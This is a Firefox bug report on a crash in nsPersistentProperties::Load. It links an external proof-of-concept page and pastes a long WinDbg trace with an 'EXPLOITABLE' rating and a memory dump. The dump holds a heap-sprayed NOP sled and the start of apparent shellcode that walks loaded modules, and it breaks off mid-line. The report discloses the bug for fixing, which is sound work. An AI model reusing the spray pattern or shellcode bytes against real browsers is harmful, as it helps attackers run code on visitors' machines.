Closed
Bug 569953
Opened 14 years ago
Closed 4 years ago
Denial of Service upon viewing a malicious website (possible remote code execution) xul!nsPersistentProperties::Load
Categories
(Firefox :: General, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: obarrera, Unassigned)
Details
(Keywords: crash, sec-vector, testcase, Whiteboard: [sg:vector-critical? (AVG)][sg:dos oom otherwise])
Attachments
(1 file, 1 obsolete file)
|
8.37 KB,
application/java-archive
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) If a user visits a malicious website with the following code(PoC) a DoS will occur resulting in memory corruption and possible remote code execution. Reproducible: Always Steps to Reproduce: 1. Visit a malicious website http://cybermediaplanet.com/security/ff3.6.3/FF3.6.3-PoC-v2.0.html 2. Run the PoC. 3. Wait for the crash and then debug, rinse and repeat. Actual Results: Crash. Expected Results: Not Crash. I reported the issue to ZDI about a month ago and they determined this is likely not an exploitable vulnerability; however, I still feel it is an issue which should be addressed. If you take a look at the stack trace there is memory corruption, now if it can be leveraged as an exploit that is the question. Either way ZDI had well over a month to pursue/report the issue to the vendor and decided not to, so I decided to notify Mozilla and post the PoC in order to get further feedback on the issue. Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach WARNING: Whitespace at end of path element CommandLine: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" WARNING: Whitespace at end of path element Symbol search path is: SRV*c:\localsymbols\*http://symbols.mozilla.org/firefox SRV*c:\localsymbols\*http://msdl.microsoft.com/download/symbols;SRV*f:\localsymbols\*http://symbols.mozilla.org/firefox ;SRV*f:\localsymbols\*http://symbols.mozilla.org/firefox;SRV*c:\code\symbols*http://msdl.microsoft.com/download/symbols;SRV*c:\code\symbols*http://build.chromium.org/buildbot/symsrv Executable search path is: ModLoad: 00c80000 00d60000 firefox.exe ModLoad: 77330000 77490000 ntdll.dll ModLoad: 75d70000 75e80000 C:\Windows\syswow64\kernel32.dll ModLoad: 64a10000 6554c000 C:\Program Files (x86)\Mozilla Firefox\xul.dll ModLoad: 6c140000 6c1b3000 C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll ModLoad: 711c0000 71270000 C:\Program Files (x86)\Mozilla Firefox\MOZCRT19.dll ModLoad: 753e0000 7548a000 C:\Windows\syswow64\msvcrt.dll ModLoad: 6a2d0000 6a3ca000 C:\Program Files (x86)\Mozilla Firefox\js3250.dll ModLoad: 10000000 10029000 C:\Program Files (x86)\Mozilla Firefox\nspr4.dll ModLoad: 76e10000 76ed6000 C:\Windows\syswow64\ADVAPI32.dll ModLoad: 75490000 75580000 C:\Windows\syswow64\RPCRT4.dll ModLoad: 75300000 75360000 C:\Windows\syswow64\Secur32.dll ModLoad: 739e0000 739e7000 C:\Windows\SysWOW64\WSOCK32.dll ModLoad: 75790000 757bd000 C:\Windows\syswow64\WS2_32.dll ModLoad: 75f00000 75f06000 C:\Windows\syswow64\NSI.dll ModLoad: 74b00000 74b32000 C:\Windows\SysWOW64\WINMM.dll ModLoad: 75bd0000 75ca0000 C:\Windows\syswow64\USER32.dll ModLoad: 76ee0000 76f70000 C:\Windows\syswow64\GDI32.dll ModLoad: 755e0000 75725000 C:\Windows\syswow64\ole32.dll ModLoad: 76a30000 76abd000 C:\Windows\syswow64\OLEAUT32.dll ModLoad: 74ac0000 74afd000 C:\Windows\SysWOW64\OLEACC.dll ModLoad: 00020000 00038000 C:\Program Files (x86)\Mozilla Firefox\smime3.dll ModLoad: 000a0000 0013d000 C:\Program Files (x86)\Mozilla Firefox\nss3.dll ModLoad: 00140000 00154000 C:\Program Files (x86)\Mozilla Firefox\nssutil3.dll ModLoad: 00160000 00167000 C:\Program Files (x86)\Mozilla Firefox\plc4.dll ModLoad: 00170000 00177000 C:\Program Files (x86)\Mozilla Firefox\plds4.dll ModLoad: 00180000 001a1000 C:\Program Files (x86)\Mozilla Firefox\ssl3.dll ModLoad: 75f20000 76a30000 C:\Windows\syswow64\SHELL32.dll ModLoad: 75580000 755d9000 C:\Windows\syswow64\SHLWAPI.dll ModLoad: 74e00000 74e08000 C:\Windows\SysWOW64\VERSION.dll ModLoad: 74a70000 74ab2000 C:\Windows\SysWOW64\WINSPOOL.DRV ModLoad: 75960000 759d3000 C:\Windows\syswow64\COMDLG32.dll ModLoad: 741c0000 7435e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.6002.18005_none_5cb72f96088b0de0\COMCTL32.dll ModLoad: 75730000 75790000 C:\Windows\syswow64\IMM32.dll ModLoad: 75ca0000 75d68000 C:\Windows\syswow64\MSCTF.dll ModLoad: 739c0000 739c5000 C:\Windows\SysWOW64\MSIMG32.dll ModLoad: 75e80000 75efd000 C:\Windows\syswow64\USP10.dll ModLoad: 74700000 74707000 C:\Program Files (x86)\Mozilla Firefox\xpcom.dll (130c.1aac): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000000 ecx=ec7a0000 edx=00000000 esi=fffffffe edi=7734ff98 eip=77340004 esp=002cf654 ebp=002cf684 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!DbgBreakPoint: 77340004 cc int 3 0:000> g ModLoad: 75f10000 75f19000 C:\Windows\syswow64\LPK.DLL ModLoad: 74900000 74980000 C:\Windows\SysWOW64\uxtheme.dll ModLoad: 74990000 7499c000 C:\Windows\SysWOW64\dwmapi.dll ModLoad: 6a3f0000 6a4cc000 C:\Windows\SysWOW64\dbghelp.dll ModLoad: 757c0000 7594a000 C:\Windows\syswow64\SETUPAPI.dll ModLoad: 749a0000 749be000 C:\Windows\SysWOW64\USERENV.dll ModLoad: 72250000 7230b000 C:\Windows\SysWOW64\PROPSYS.dll ModLoad: 76d80000 76e04000 C:\Windows\syswow64\CLBCatQ.DLL ModLoad: 74360000 74368000 C:\Program Files (x86)\Mozilla Firefox\components\browserdirprovider.dll ModLoad: 00bd0000 00c14000 C:\Windows\SysWOW64\nvLsp.dll ModLoad: 75950000 75957000 C:\Windows\syswow64\PSAPI.DLL ModLoad: 73f70000 73fab000 C:\Windows\SysWOW64\mswsock.dll ModLoad: 73fb0000 73fb5000 C:\Windows\SysWOW64\wshtcpip.dll ModLoad: 74590000 745a9000 C:\Windows\SysWOW64\iphlpapi.dll ModLoad: 740e0000 74115000 C:\Windows\SysWOW64\dhcpcsvc.DLL ModLoad: 740b0000 740dc000 C:\Windows\SysWOW64\DNSAPI.dll ModLoad: 74980000 74987000 C:\Windows\SysWOW64\WINNSI.DLL ModLoad: 74080000 740a2000 C:\Windows\SysWOW64\dhcpcsvc6.DLL ModLoad: 72f90000 72fb4000 C:\Program Files (x86)\Mozilla Firefox\components\brwsrcmp.dll ModLoad: 745c0000 745e1000 C:\Windows\SysWOW64\NTMARTA.DLL ModLoad: 75390000 753d9000 C:\Windows\syswow64\WLDAP32.dll ModLoad: 74630000 74641000 C:\Windows\SysWOW64\SAMLIB.dll ModLoad: 72f60000 72f8b000 C:\Windows\SysWOW64\t2embed.dll ModLoad: 74560000 7456f000 C:\Windows\SysWOW64\NLAapi.dll ModLoad: 744d0000 744df000 C:\Windows\SysWOW64\napinsp.dll ModLoad: 74490000 744a2000 C:\Windows\SysWOW64\pnrpnsp.dll ModLoad: 744c0000 744c8000 C:\Windows\SysWOW64\winrnr.dll ModLoad: 71f00000 71ff4000 C:\Windows\SysWOW64\WindowsCodecs.dll ModLoad: 74a20000 74a4c000 C:\Windows\SysWOW64\apphelp.dll ModLoad: 05960000 05978000 TORTOISEOVERLAYS.dll ModLoad: 05960000 05978000 C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll ModLoad: 05940000 0594e000 C:\Program Files (x86)\TortoiseSVN\bin\TortoiseStub.dll ModLoad: 04a00000 04aca000 C:\Program Files (x86)\TortoiseSVN\bin\TortoiseSVN.dll ModLoad: 74f70000 74f75000 C:\Windows\SysWOW64\SHFOLDER.dll ModLoad: 76b50000 76c36000 C:\Windows\syswow64\WININET.dll ModLoad: 77300000 77303000 C:\Windows\syswow64\Normaliz.dll ModLoad: 76c40000 76d73000 C:\Windows\syswow64\urlmon.dll ModLoad: 759e0000 75bc8000 C:\Windows\syswow64\iertutil.dll ModLoad: 6eec0000 6eee2000 C:\Program Files (x86)\TortoiseSVN\bin\libapr_tsvn.dll ModLoad: 73a30000 73ad3000 C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\MSVCR90.dll ModLoad: 6ee60000 6ee8f000 C:\Program Files (x86)\TortoiseSVN\bin\libaprutil_tsvn.dll ModLoad: 02c30000 02c42000 C:\Program Files (x86)\TortoiseSVN\bin\intl3_tsvn.dll ModLoad: 71e70000 71efe000 C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\MSVCP90.dll ModLoad: 73ba0000 73c92000 C:\Windows\SysWOW64\CRYPT32.dll ModLoad: 74060000 74072000 C:\Windows\SysWOW64\MSASN1.dll ModLoad: 72e90000 72eaf000 EhStorAPI.DLL ModLoad: 72e90000 72eaf000 C:\Windows\SysWOW64\EhStorShell.dll ModLoad: 729b0000 72bcf000 GrooveShellExtensions.DLL ModLoad: 729b0000 72bcf000 C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll ModLoad: 72090000 72182000 C:\Program Files (x86)\Microsoft Office\Office12\GrooveUtil.DLL ModLoad: 74120000 741bb000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d08d7da0442a985d\MSVCR80.dll ModLoad: 72ec0000 72ec7000 C:\Program Files (x86)\Microsoft Office\Office12\GrooveNew.DLL ModLoad: 72d30000 72d4b000 C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL ModLoad: 749e0000 74a1b000 C:\Windows\SysWOW64\rsaenh.dll ModLoad: 70fe0000 710e8000 C:\Windows\SysWOW64\shdocvw.dll ModLoad: 02c70000 02c96000 C:\Program Files (x86)\Mozilla Firefox\softokn3.dll ModLoad: 02d80000 02d98000 C:\Program Files (x86)\Mozilla Firefox\nssdbm3.dll ModLoad: 02da0000 02de1000 C:\Program Files (x86)\Mozilla Firefox\freebl3.dll ModLoad: 02df0000 02e45000 C:\Program Files (x86)\Mozilla Firefox\nssckbi.dll ModLoad: 71cf0000 71d52000 C:\Windows\SysWOW64\mscms.dll ModLoad: 71e30000 71e68000 C:\Windows\SysWOW64\icm32.dll ModLoad: 6c660000 6c7b1000 C:\Program Files (x86)\AVG\AVG9\Firefox\components\avgssff.dll ModLoad: 73fd0000 74057000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d08d7da0442a985d\MSVCP80.dll ModLoad: 6bc50000 6bca0000 C:\Program Files (x86)\AVG\AVG9\avglogx.dll ModLoad: 6db90000 6dca1000 C:\Program Files (x86)\AVG\AVG9\avgxpl.dll ModLoad: 06800000 068e5000 C:\Program Files (x86)\AVG\AVG9\avglvex.dll ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll ModLoad: 6a920000 6aa08000 C:\Program Files (x86)\AVG\AVG9\avgcfgx.dll ModLoad: 6aa70000 6aad7000 C:\Program Files (x86)\AVG\AVG9\avgclitx.dll ModLoad: 6bbd0000 6bc1f000 C:\Program Files (x86)\AVG\AVG9\avglngx.dll ModLoad: 73b80000 73b85000 C:\Windows\SysWOW64\wship6.dll ModLoad: 749c0000 749c6000 C:\Windows\SysWOW64\rasadhlp.dll (130c.1aac): C++ EH exception - code e06d7363 (first chance) (130c.1aac): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000 eip=75d8e124 esp=002cded0 ebp=002cdf20 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 kernel32!RaiseException+0x58: 75d8e124 c9 leave 0:000> gu WARNING: Continuing a non-continuable exception eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000 eip=711ec54b esp=002cdf38 ebp=002cdf58 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 MOZCRT19!_CxxThrowException+0x46: 711ec54b c9 leave 0:000> gu eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000 eip=711f4f33 esp=002cdf68 ebp=002cdf94 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 MOZCRT19!operator new+0x73: 711f4f33 83c40c add esp,0Ch 0:000> gu eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f820 edi=00002000 eip=64a36dff esp=002cdf78 ebp=002cdf94 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 xul!ByteBufferImpl::Init+0x1f: 64a36dff 894608 mov dword ptr [esi+8],eax ds:002b:4bf7f828=00000000 0:000> gu eax=00000000 ebx=4bf7f6e0 ecx=00002000 edx=00000000 esi=4bf7f6ec edi=00002000 eip=64a36eec esp=002cdf8c ebp=002cdf94 iopl=0 nv up ei pl zr ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000257 xul!NS_NewByteBuffer+0x25: 64a36eec 8bf8 mov edi,eax 0:000> gu eax=00000000 ebx=4bf7f6e0 ecx=4bf7f6ec edx=00000000 esi=4bf7f6ec edi=00002000 eip=64bc77c3 esp=002cdf9c ebp=002cdfc4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 xul!UTF8InputStream::Init+0x1f: 64bc77c3 85c0 test eax,eax 0:000> gu (130c.1aac): C++ EH exception - code e06d7363 (first chance) (130c.1aac): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000 eip=75d8e124 esp=002cded0 ebp=002cdf20 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 kernel32!RaiseException+0x58: 75d8e124 c9 leave 0:000> gu WARNING: Continuing a non-continuable exception eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000 eip=711ec54b esp=002cdf38 ebp=002cdf58 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 MOZCRT19!_CxxThrowException+0x46: 711ec54b c9 leave 0:000> gu eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000 eip=711f4f33 esp=002cdf68 ebp=002cdf94 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 MOZCRT19!operator new+0x73: 711f4f33 83c40c add esp,0Ch 0:000> gu eax=002cded0 ebx=4bf7f6e0 ecx=00000003 edx=00000000 esi=4bf7f840 edi=00002000 eip=64a36cf0 esp=002cdf78 ebp=002cdf94 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 xul!UnicharBufferImpl::Init+0x2d: 64a36cf0 894608 mov dword ptr [esi+8],eax ds:002b:4bf7f848=00000000 0:000> gu eax=00000000 ebx=4bf7f6e0 ecx=00004000 edx=00000000 esi=4bf7f6ec edi=00002000 eip=64a36dc9 esp=002cdf8c ebp=002cdf94 iopl=0 nv up ei pl zr ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000257 xul!NS_NewUnicharBuffer+0x1e: 64a36dc9 8bf8 mov edi,eax 0:000> gu eax=00000000 ebx=4bf7f6e0 ecx=4bf7f6f0 edx=00000000 esi=4bf7f6ec edi=00002000 eip=64bc77dd esp=002cdf9c ebp=002cdfc4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 xul!UTF8InputStream::Init+0x39: 64bc77dd 85c0 test eax,eax 0:000> gu eax=00000000 ebx=11d77978 ecx=4bf7f6e8 edx=47fe4440 esi=4bf7f6e0 edi=11d77978 eip=64a4b21b esp=002cdfbc ebp=002cdfc4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 xul!nsSimpleUnicharStreamFactory::CreateInstanceFromUTF8Stream+0x3a: 64a4b21b 85c0 test eax,eax 0:000> gu eax=00000000 ebx=11d77978 ecx=4bf7f6e8 edx=47fe4440 esi=11d77970 edi=00000000 eip=64a4b283 esp=002cdfd8 ebp=002ce1d8 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 xul!nsPersistentProperties::Load+0x46: 64a4b283 85c0 test eax,eax 0:000> gu (130c.1aac): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=69726353 ebx=002cdf7c ecx=00000000 edx=00000002 esi=6c476469 edi=6c61626f eip=20646962 esp=002cdf14 ebp=726f463d iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 20646962 cc int 3 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\AVG\AVG9\Firefox\components\avgssff.dll - 0:000> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x20646962 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Data Execution Protection (DEP) Violation Exception Hash (Major/Minor): 0x264d5172.0x1d4a643b Stack Trace: Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown avgssff!NSGetModule+0x5b74a xul!__dyn_tls_init_callback <PERF> (xul+0xb3776f)+0x0 Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown avgssff!NSGetModule+0x59760 Unknown Unknown Unknown Unknown Unknown xpcom!__dyn_tls_init_callback <PERF> (xpcom+0x6972)+0x0 msvcrt!_wstat32i64+0xdd Unknown Unknown Unknown Unknown Unknown Unknown Unknown xul!__dyn_tls_init_callback <PERF> (xul+0xb12064)+0x0 Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Unknown Instruction Address: 0x0000000020646962 Description: Data Execution Prevention Violation Short Description: DEPViolation Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000020646962 called from avgssff!NSGetModule+0x000000000005b74a (Hash=0x264d5172.0x1d4a643b) User mode DEP access violations are exploitable. #!------------------------------------------------------------------------!# 20646956 cc int 3 20646957 cc int 3 20646958 cc int 3 20646959 cc int 3 2064695a cc int 3 2064695b cc int 3 2064695c cc int 3 2064695d cc int 3 2064695e cc int 3 2064695f cc int 3 20646960 cc int 3 20646961 cc int 3 20646962 cc int 3 20646963 cc int 3 20646964 cc int 3 20646965 cc int 3 20646966 cc int 3 20646967 cc int 3 20646968 cc int 3 20646969 cc int 3 2064696a cc int 3 2064696b cc int 3 2064696c cc int 3 2064696d cc int 3 2064696e cc int 3 2064696f cc int 3 20646970 cc int 3 20646963 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646988 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 206469ad cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 206469d2 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 206469f7 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646a1c cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646a41 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646a66 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646a8b cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646ab0 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646ad5 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646afa cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646b1f cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646b44 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646b69 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646b8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646bb3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646bd8 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646bfd cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646c22 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646c47 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646c6c cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646c91 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646cb6 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646cdb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646d00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646d25 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646d4a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646d6f cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646d94 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646db9 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646dde cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646e03 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646e28 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646e4d cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646e72 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646e97 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646ebc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646ee1 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646f06 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646f2b cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646f50 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646f75 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646f9a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646fbf cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ..................................... 20646fe4 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 90 90 90 90 90 90 90 90 90 ..................................... 20647009 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ..................................... 2064702e 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ..................................... 20647053 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ..................................... 20647078 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ..................................... 2064709d 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 60 e8 00 00 .................................`... 206470c2 00 00 5d 81 ed 06 00 00 00 8a 85 12 01 00 00 08 c0 75 0f fe 85 12 01 00 00 e8 1a 00 00 00 09 c0 74 10 6a 0a 8d ..]..............u..............t.j.. 206470e7 85 14 01 00 00 50 ff 95 06 01 00 00 61 31 c0 89 c4 50 c3 60 8d bd 02 01 00 00 31 c0 b0 30 64 8b 00 8b 40 0c 8b .....P......a1...P.`......1..0d...@.. 2064710c 40 1c 8b 00 8b 40 08 fc 89 c6 83 3f 00 74 0f ff 37 56 e8 33 00 00 00 09 c0 74 2b ab eb ec 83 c7 04 83 3f 00 74 @....@.....?.t..7V.3.....t+.......?.t 20647131 17 89 f8 40 50 ff 95 02 01 